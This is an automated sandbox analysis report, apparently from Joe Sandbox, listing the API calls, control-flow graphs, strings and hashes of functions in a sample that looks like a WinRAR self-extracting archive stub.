• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: H_prologItemTextWindow
• String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
• API String ID: 810644672-581484061
• Opcode ID: 4e4c5e986fd0d0226c00e9beba2c2a7d7b9a963d92d098db338e27823f450e77
• Instruction ID: 222876fc7c5905706c06243b0a04a8fd5b2fc19b1bf0054f9fba6f461795cd0e
• Opcode Fuzzy Hash: 4e4c5e986fd0d0226c00e9beba2c2a7d7b9a963d92d098db338e27823f450e77
                                                                                      • Instruction Fuzzy Hash: 6542F371A40305EEEB21BB689C8AFBE3BACEB06740F484156F645E62D1D7754D84CB32

Control-flow Graph (function at d7f353; graph image not rendered)
APIs
• GetModuleHandleW.KERNEL32 ref: 00D7F36B
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D7F383
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D7F3A6
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D7F651
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D7F669
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D7F67B
• ReadFile.KERNEL32(00000000,?,00007FFE,00DA0858,00000000), ref: 00D7F69A
• CloseHandle.KERNEL32(00000000), ref: 00D7F6F2
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D7F708
• CompareStringW.KERNEL32(00000400,00001001,00DA08A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00D7F762
• GetFileAttributesW.KERNELBASE(?,?,00DA0870,00000800,?,00000000,?,00000800), ref: 00D7F78B
• GetFileAttributesW.KERNEL32(?,?,00DA0930,00000800), ref: 00D7F7C4
  • Part of subcall function 00D7F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7F324
  • Part of subcall function 00D7F309: LoadLibraryW.KERNELBASE(?,?,00D7DEC8,Crypt32.dll,?,00D7DF4A,?,00D7DF2E,?,?,?,?), ref: 00D7F346
• _swprintf.LIBCMT ref: 00D7F834
• _swprintf.LIBCMT ref: 00D7F880
  • Part of subcall function 00D73F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73F6E
• AllocConsole.KERNEL32 ref: 00D7F888
• GetCurrentProcessId.KERNEL32 ref: 00D7F892
• AttachConsole.KERNEL32(00000000), ref: 00D7F899
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D7F8BF
• WriteConsoleW.KERNEL32(00000000), ref: 00D7F8C6
• Sleep.KERNEL32(00002710), ref: 00D7F8D1
• FreeConsole.KERNEL32 ref: 00D7F8D7
• ExitProcess.KERNEL32 ref: 00D7F8DF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
• API String ID: 1201351596-3298887752
• Opcode ID: cdb122ba85e3cf30524fa2010be4802d9172e477a749c34b0c62c9bf6af394d1
• Instruction ID: 8c09c74265b8906c8d76421024a2f64295bded7780222a1b2b53bce659a76caa
• Opcode Fuzzy Hash: cdb122ba85e3cf30524fa2010be4802d9172e477a749c34b0c62c9bf6af394d1
• Instruction Fuzzy Hash: 5FD15DB10483849AD730EF60C849B9FBEE8EF86304F54892DF58996380D7B49548CBB7

Control-flow Graph (function at d8aa45; graph image not rendered)
APIs
• __EH_prolog.LIBCMT ref: 00D8AA4A
  • Part of subcall function 00D896EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D897B4
• SetFileAttributesW.KERNEL32(?,00000005,?,?,00000000,00000001,00D8A35D,?,00000000), ref: 00D8AB7F
• GetFileAttributesW.KERNEL32(?), ref: 00D8AC39
• DeleteFileW.KERNEL32(?), ref: 00D8AC47
• SetWindowTextW.USER32(?,?), ref: 00D8AD90
• _wcsrchr.LIBVCRUNTIME ref: 00D8AF1A
• GetDlgItem.USER32(?,00000066), ref: 00D8AF55
• SetWindowTextW.USER32(00000000,?), ref: 00D8AF65
• SendMessageW.USER32(00000000,00000143,00000000,00DB412A), ref: 00D8AF79
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D8AFA2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
• String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
• API String ID: 3676479488-312220925
• Opcode ID: f1a469ba20aeb97c24486aaea551e8d8e755959235e1e8177397cd48d8684c0b
• Instruction ID: 929c9967c25ceda8e9a7363696d5fd92021c83bf8b553adb8907c363139d6f53
• Opcode Fuzzy Hash: f1a469ba20aeb97c24486aaea551e8d8e755959235e1e8177397cd48d8684c0b
• Instruction Fuzzy Hash: BFE15C76900219AAEF21BBA4DD85EEE73BCEB05350F1440A7F949E7141EB709B84CB71

Control-flow Graph (function at d7ced7; graph image not rendered)
APIs
  • Part of subcall function 00D7C88E: _wcschr.LIBVCRUNTIME ref: 00D7C8BD
• GetWindowRect.USER32(?,?), ref: 00D7CF0E
• GetClientRect.USER32(?,?), ref: 00D7CF1A
• GetWindowLongW.USER32(?,000000F0), ref: 00D7CFBB
• GetWindowRect.USER32(?,?), ref: 00D7CFE8
• GetWindowTextW.USER32(?,?,00000400), ref: 00D7D007
• SetWindowTextW.USER32(?,?), ref: 00D7D02E
• GetSystemMetrics.USER32(00000008), ref: 00D7D036
• GetWindow.USER32(?,00000005), ref: 00D7D041
• GetWindowTextW.USER32(00000000,?,00000400), ref: 00D7D06C
• SetWindowTextW.USER32(00000000,00000000), ref: 00D7D099
• GetWindowRect.USER32(00000000,?), ref: 00D7D0AC
• GetWindow.USER32(00000000,00000002), ref: 00D7D11E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: Window$RectText$ClientLongMetricsSystem_wcschr
• String ID: d
• API String ID: 4134264131-2564639436
• Opcode ID: a975c4ce43f36792b1069d2a49fc23430f94d9e9895c7c9cf5601dc5ef265e02
• Instruction ID: f04551ed18f49ee58fe1bd760655d0a86b8fcadccd50509c21dc02387fa42f99
• Opcode Fuzzy Hash: a975c4ce43f36792b1069d2a49fc23430f94d9e9895c7c9cf5601dc5ef265e02
• Instruction Fuzzy Hash: 58615A72208340AFD311DF68CD89A6BBBEAEF89714F44591DF684D2290D774E909CB72

Control-flow Graph (graph image not rendered)

APIs
• GetDlgItem.USER32(00000068,00DC8958), ref: 00D8B71D
• ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00D89325), ref: 00D8B748
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D8B757
• SendMessageW.USER32(00000000,000000C2,00000000,00DA02E4), ref: 00D8B761
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D8B777
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D8B78D
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D8B7CD
• SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D8B7D7
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D8B7E6
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D8B809
• SendMessageW.USER32(00000000,000000C2,00000000,00DA1368), ref: 00D8B814
Strings
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: MessageSend$ItemShowWindow
• String ID: \
• API String ID: 1207805008-2967466578
• Opcode ID: d86b7a5c67280f7cd6b1c5f9ca53df04b27f3170b86308a635d71530be12ce82
• Instruction ID: a07936102181fb074ba06bd476198dc3665e33c9aa9ac8f55375b4feba3630c3
• Opcode Fuzzy Hash: d86b7a5c67280f7cd6b1c5f9ca53df04b27f3170b86308a635d71530be12ce82
• Instruction Fuzzy Hash: 8D210171285744BFE311BB249C41FAB7E9CEF82714F040619FA90E62D0D7A54A098BBB

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 621 d8b9aa-d8b9c2 call d8cec0 624 d8b9c8-d8b9d4 call d920b3 621->624 625 d8bc0e-d8bc16 621->625 624->625 628 d8b9da-d8ba02 call d8dea0 624->628 631 d8ba0c-d8ba19 628->631 632 d8ba04 628->632 633 d8ba1b 631->633 634 d8ba1d-d8ba26 631->634 632->631 633->634 635 d8ba28-d8ba2a 634->635 636 d8ba5e 634->636 637 d8ba32-d8ba35 635->637 638 d8ba62-d8ba64 636->638 639 d8ba3b-d8ba43 637->639 640 d8bbc2-d8bbc7 637->640 641 d8ba6b-d8ba6d 638->641 642 d8ba66-d8ba69 638->642 643 d8ba49-d8ba4f 639->643 644 d8bbdb-d8bbe3 639->644 645 d8bbc9 640->645 646 d8bbbc-d8bbc0 640->646 647 d8ba80-d8ba92 call d7b09c 641->647 648 d8ba6f-d8ba76 641->648 642->641 642->647 643->644 649 d8ba55-d8ba5c 643->649 651 d8bbeb-d8bbf3 644->651 652 d8bbe5-d8bbe7 644->652 650 d8bbce-d8bbd2 645->650 646->640 646->650 656 d8baab-d8bab6 call d79dff 647->656 657 d8ba94-d8baa1 call d80b12 647->657 648->647 653 d8ba78 648->653 649->636 649->637 650->644 651->638 652->651 653->647 663 d8bab8-d8bacf call d7ae20 656->663 664 d8bad3-d8bae0 ShellExecuteExW 656->664 657->656 662 d8baa3 657->662 662->656 663->664 666 d8bc0c-d8bc0d 664->666 667 d8bae6-d8baf9 664->667 666->625 669 d8bafb-d8bb02 667->669 670 d8bb0c-d8bb0e 667->670 669->670 671 d8bb04-d8bb0a 669->671 672 d8bb10-d8bb19 670->672 673 d8bb21-d8bb40 call d8be69 670->673 671->670 674 d8bb77-d8bb83 CloseHandle 671->674 672->673 679 d8bb1b-d8bb1f ShowWindow 672->679 673->674 691 d8bb42-d8bb4a 673->691 677 d8bb94-d8bba2 674->677 678 d8bb85-d8bb92 call d80b12 674->678 680 d8bbff-d8bc01 677->680 681 d8bba4-d8bba6 677->681 678->677 689 d8bbf8 678->689 679->673 680->666 684 d8bc03-d8bc05 680->684 681->680 686 d8bba8-d8bbae 681->686 684->666 688 d8bc07-d8bc0a ShowWindow 684->688 686->680 690 d8bbb0-d8bbba 686->690 688->666 689->680 690->680 691->674 692 d8bb4c-d8bb5d GetExitCodeProcess 691->692 692->674 693 d8bb5f-d8bb69 692->693 694 d8bb6b 693->694 695 d8bb70 693->695 694->695 695->674
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(000001C0), ref: 00D8BAD8
                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00D8BB1D
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00D8BB55
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D8BB7B
                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00D8BC0A
                                                                                        • Part of subcall function 00D80B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7AC49,?,?,?,00D7ABF8,?,-00000002,?,00000000,?), ref: 00D80B28
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                      • String ID: $.exe$.inf
                                                                                      • API String ID: 3686203788-2452507128
                                                                                      • Opcode ID: 489f70c44a011494fbe1a0ea8780603b780df84d3e5e5ff324126f060405e45c
                                                                                      • Instruction ID: 7e5096b504fae094d586ce0ccb057967f26e546b14660102bf078c142d5ccb07
                                                                                      • Opcode Fuzzy Hash: 489f70c44a011494fbe1a0ea8780603b780df84d3e5e5ff324126f060405e45c
                                                                                      • Instruction Fuzzy Hash: 2C51E5705057819AD731BF24C940ABBBBF9EF85724F08081EE4C593295EBB1A948DB72

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 696 d7cacc-d7cb00 call d8cdf0 call d8cec0 call d90138 703 d7cb33-d7cb3c call d7f10e 696->703 704 d7cb02-d7cb31 GetModuleFileNameW call d7b88c call d7f0e6 696->704 707 d7cb41-d7cb65 call d79401 call d7973d 703->707 704->707 715 d7cb6b-d7cb74 707->715 716 d7cdb8-d7cdd3 call d79437 707->716 718 d7cb77-d7cb7a 715->718 720 d7cb80-d7cb86 call d79aeb 718->720 721 d7cca8-d7ccc8 call d799e0 call d920d3 718->721 725 d7cb8b-d7cbb2 call d7990d 720->725 721->716 732 d7ccce-d7cce7 call d7990d 721->732 730 d7cc71-d7cc74 725->730 731 d7cbb8-d7cbc0 725->731 736 d7cc77-d7cc99 call d799e0 730->736 734 d7cbc2-d7cbca 731->734 735 d7cbeb-d7cbf6 731->735 742 d7ccf0-d7cd02 call d920d3 732->742 743 d7cce9-d7ccee 732->743 734->735 738 d7cbcc-d7cbe6 call d93660 734->738 739 d7cc21-d7cc29 735->739 740 d7cbf8-d7cc04 735->740 736->718 754 d7cc9f-d7cca2 736->754 757 d7cc67-d7cc6f 738->757 758 d7cbe8 738->758 747 d7cc55-d7cc59 739->747 748 d7cc2b-d7cc33 739->748 740->739 745 d7cc06-d7cc0b 740->745 742->716 764 d7cd08-d7cd25 call d806e9 call d920ce 742->764 750 d7cd27-d7cd2f 743->750 745->739 753 d7cc0d-d7cc1f call d93589 745->753 747->730 749 d7cc5b-d7cc5e 747->749 748->747 755 d7cc35-d7cc4f call d93660 748->755 749->731 760 d7cd34-d7cd41 750->760 761 d7cd31 750->761 753->739 769 d7cc63 753->769 754->716 754->721 755->716 755->747 757->736 758->735 766 d7cd43-d7cd45 760->766 767 d7cdad-d7cdb5 760->767 761->760 764->750 770 d7cd46-d7cd50 766->770 767->716 769->757 770->767 771 d7cd52-d7cd56 770->771 773 d7cd90-d7cd93 771->773 774 d7cd58-d7cd5f 771->774 779 d7cd95-d7cd9b 773->779 780 d7cd9d-d7cd9f 773->780 776 d7cd86 774->776 777 d7cd61-d7cd64 774->777 783 d7cd88-d7cd8e 776->783 781 d7cd66-d7cd69 777->781 782 d7cd82-d7cd84 777->782 779->780 784 d7cda0 779->784 780->784 786 d7cd7e-d7cd80 781->786 787 d7cd6b-d7cd6e 781->787 782->783 785 d7cda4-d7cdab 783->785 784->785 785->767 785->770 786->783 788 d7cd70-d7cd74 787->788 789 d7cd7a-d7cd7c 787->789 788->784 790 d7cd76-d7cd78 788->790 789->783 790->783
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D7CAD1
                                                                                      • _wcschr.LIBVCRUNTIME ref: 00D7CAEF
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00D7CAB3,?), ref: 00D7CB0A
                                                                                        • Part of subcall function 00D806E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D7B25B,00000000,?,?), ref: 00D80705
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                      • String ID: *messages***$*messages***$R$a
                                                                                      • API String ID: 803915177-2900423073
                                                                                      • Opcode ID: 6c98c01bb61cdd0dbf27c766987efe3a1c783c6049a25ec8726a35788bfde9ef
                                                                                      • Instruction ID: 1ce4b8a879bdc91076f9f2bfa1f65aa7cde88506c894ac466994e07ae6f27443
                                                                                      • Opcode Fuzzy Hash: 6c98c01bb61cdd0dbf27c766987efe3a1c783c6049a25ec8726a35788bfde9ef
                                                                                      • Instruction Fuzzy Hash: C29105B2A102049EDB30DF68CC45BAEBBA4EF54310F18D56EE64DA7291F7709984CB70

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 791 d973ae-d973c7 792 d973c9-d973d9 call d9b9bc 791->792 793 d973dd-d973e2 791->793 792->793 803 d973db 792->803 795 d973ef-d97413 MultiByteToWideChar 793->795 796 d973e4-d973ec 793->796 797 d97419-d97425 795->797 798 d975a6-d975b9 call d8d783 795->798 796->795 800 d97479 797->800 801 d97427-d97438 797->801 807 d9747b-d9747d 800->807 804 d9743a-d97449 call d9f160 801->804 805 d97457-d97468 call d959fc 801->805 803->793 810 d9759b 804->810 818 d9744f-d97455 804->818 805->810 819 d9746e 805->819 807->810 811 d97483-d97496 MultiByteToWideChar 807->811 812 d9759d-d975a4 call d97616 810->812 811->810 815 d9749c-d974ae call d97a09 811->815 812->798 820 d974b3-d974b7 815->820 822 d97474-d97477 818->822 819->822 820->810 823 d974bd-d974c4 820->823 822->807 824 d974fe-d9750a 823->824 825 d974c6-d974cb 823->825 827 d9750c-d9751d 824->827 828 d97556 824->828 825->812 826 d974d1-d974d3 825->826 826->810 829 d974d9-d974f3 call d97a09 826->829 831 d97538-d97549 call d959fc 827->831 832 d9751f-d9752e call d9f160 827->832 830 d97558-d9755a 828->830 829->812 844 d974f9 829->844 835 d9755c-d97575 call d97a09 830->835 836 d97594-d9759a call d97616 830->836 831->836 843 d9754b 831->843 832->836 847 d97530-d97536 832->847 835->836 849 d97577-d9757e 835->849 836->810 848 d97551-d97554 843->848 844->810 847->848 848->830 850 d975ba-d975c0 849->850 851 d97580-d97581 849->851 852 d97582-d97592 WideCharToMultiByte 850->852 851->852 852->836 853 d975c2-d975c9 call d97616 852->853 853->812
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D92FC2,00D92FC2,?,?,?,00D975FF,00000001,00000001,F5E85006), ref: 00D97408
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D975FF,00000001,00000001,F5E85006,?,?,?), ref: 00D9748E
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D97588
                                                                                      • __freea.LIBCMT ref: 00D97595
                                                                                        • Part of subcall function 00D959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D923AA,?,0000015D,?,?,?,?,00D92F29,000000FF,00000000,?,?), ref: 00D95A2E
                                                                                      • __freea.LIBCMT ref: 00D9759E
                                                                                      • __freea.LIBCMT ref: 00D975C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID: d0F
                                                                                      • API String ID: 1414292761-1238022483
                                                                                      • Opcode ID: cb53e77fc731a48cc29506ed7891295a4df99ead5ce50839539afadad2287fa1
                                                                                      • Instruction ID: 56f1f3e5aab6f8b11599b50885700bb1c1e24207f5ef515bfae2366a3e1e4ef6
                                                                                      • Opcode Fuzzy Hash: cb53e77fc731a48cc29506ed7891295a4df99ead5ce50839539afadad2287fa1
                                                                                      • Instruction Fuzzy Hash: F051E272624216ABEF658F64CC81EBF7BA9EB44750F5A4629FC04D7190EB34DC40C6B0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00D7F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7F324
                                                                                        • Part of subcall function 00D7F309: LoadLibraryW.KERNELBASE(?,?,00D7DEC8,Crypt32.dll,?,00D7DF4A,?,00D7DF2E,?,?,?,?), ref: 00D7F346
                                                                                      • OleInitialize.OLE32(00000000), ref: 00D8904F
                                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D89086
                                                                                      • SHGetMalloc.SHELL32(00DB20E8), ref: 00D89090
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                      • String ID: riched20.dll$3Ro
                                                                                      • API String ID: 3498096277-3613677438
                                                                                      • Opcode ID: a1f958cccfb55ace794bf7b8613323329e00d394014293b772425c9691f3bb3f
                                                                                      • Instruction ID: bc04940ed51e7bba9e1eaee19e909ca7a2684c64669144a5bc9b7f68b4369c4c
                                                                                      • Opcode Fuzzy Hash: a1f958cccfb55ace794bf7b8613323329e00d394014293b772425c9691f3bb3f
                                                                                      • Instruction Fuzzy Hash: 2FF0FFB5D00209ABCB50AF9AD8499EEFFFCEF95711F00415AE814E2250D7B45645CBB2

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00D7FDC9: ResetEvent.KERNEL32(?,?,00D7F9F3,01021ED8,?,00DB1E74,00000000,00D9F79B,000000FF,000001B8,00D7FC8F,?,?,?,?,00D7A5A0), ref: 00D7FDE9
                                                                                        • Part of subcall function 00D7FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,00D7A5A0,?,?,?,?,00D9F79B,000000FF), ref: 00D7FDFD
                                                                                      • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 00D7FA05
                                                                                      • CloseHandle.KERNEL32(?,?), ref: 00D7FA1F
